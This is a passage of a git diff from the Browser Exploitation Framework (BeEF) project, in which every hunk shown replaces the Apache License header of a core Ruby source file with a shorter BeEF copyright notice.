-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb
index 89ae6f14d..d4c97834a 100644
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/logger.rb b/core/main/logger.rb
index 623b17ba1..5486be58c 100644
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/migration.rb b/core/main/migration.rb
index e9b553fc4..973ea0229 100644
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 3ac2cd2af..020da0e06 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/command.rb b/core/main/models/command.rb
index 22771e7b6..bc408b22f 100644
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/models/commandmodule.rb b/core/main/models/commandmodule.rb
index 9ade6f12e..11100aaa4 100644
--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/hookedbrowser.rb b/core/main/models/hookedbrowser.rb
index 0f48f00a8..13c011e04 100644
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/log.rb b/core/main/models/log.rb
index 9089c0c07..3e78c0c7f 100644
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/optioncache.rb b/core/main/models/optioncache.rb
index 74851f908..9dedec1d1 100644
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/result.rb b/core/main/models/result.rb
index 481069b86..50e20ed1b 100644
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/models/user.rb b/core/main/models/user.rb
index 34d98151e..6b5947bad 100644
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/network_stack/api.rb b/core/main/network_stack/api.rb
index 731853f64..1e7c5bae2 100644
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index 2e1162e21..c17c0689c 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb
index f2a32fb5e..276b63780 100644
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb
index a17d3c35d..a9274f5b5 100644
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb
index 4a848696c..9171b2c76 100644
--- a/core/main/rest/api.rb
+++ b/core/main/rest/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/rest/handlers/admin.rb b/core/main/rest/handlers/admin.rb
index d36935bfe..6730f2d9e 100644
--- a/core/main/rest/handlers/admin.rb
+++ b/core/main/rest/handlers/admin.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/rest/handlers/categories.rb b/core/main/rest/handlers/categories.rb
index edb2fd242..88d5e8302 100644
--- a/core/main/rest/handlers/categories.rb
+++ b/core/main/rest/handlers/categories.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb
index 20d38047a..f3384a6ca 100644
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/rest/handlers/logs.rb b/core/main/rest/handlers/logs.rb
index 7f90ad884..6d7d4b109 100644
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb
index bc3c8a8b3..14ad22e4b 100644
--- a/core/main/rest/handlers/modules.rb
+++ b/core/main/rest/handlers/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/router/api.rb b/core/main/router/api.rb
index 7bad31f33..3d2bc78d5 100644
--- a/core/main/router/api.rb
+++ b/core/main/router/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index e6ca7151b..958d29117 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/main/server.rb b/core/main/server.rb
index e45fbbf77..c0ddaee47 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/module.rb b/core/module.rb
index bb4fd29ed..4856008ef 100644
--- a/core/module.rb
+++ b/core/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Module
diff --git a/core/modules.rb b/core/modules.rb
index 37d7ac953..5dff69520 100644
--- a/core/modules.rb
+++ b/core/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Modules
diff --git a/core/ruby.rb b/core/ruby.rb
index d606555f9..b1d2f53f7 100644
--- a/core/ruby.rb
+++ b/core/ruby.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # @note Patching Ruby Security
diff --git a/core/ruby/hash.rb b/core/ruby/hash.rb
index 1ee46bec0..f24b3f30d 100644
--- a/core/ruby/hash.rb
+++ b/core/ruby/hash.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Hash
 
diff --git a/core/ruby/module.rb b/core/ruby/module.rb
index 7fa3d53d4..3eb170caa 100644
--- a/core/ruby/module.rb
+++ b/core/ruby/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Module
 
diff --git a/core/ruby/object.rb b/core/ruby/object.rb
index da57bcfd9..98de6419b 100644
--- a/core/ruby/object.rb
+++ b/core/ruby/object.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Object
 
diff --git a/core/ruby/patches/dm-do-adapter/adapter.rb b/core/ruby/patches/dm-do-adapter/adapter.rb
index 9d5d92a60..01117ab86 100644
--- a/core/ruby/patches/dm-do-adapter/adapter.rb
+++ b/core/ruby/patches/dm-do-adapter/adapter.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 
diff --git a/core/ruby/print.rb b/core/ruby/print.rb
index 138809b0c..417fbcdf1 100644
--- a/core/ruby/print.rb
+++ b/core/ruby/print.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Function used to print errors to the console
diff --git a/core/ruby/security.rb b/core/ruby/security.rb
index b3de1d769..34baa2813 100644
--- a/core/ruby/security.rb
+++ b/core/ruby/security.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
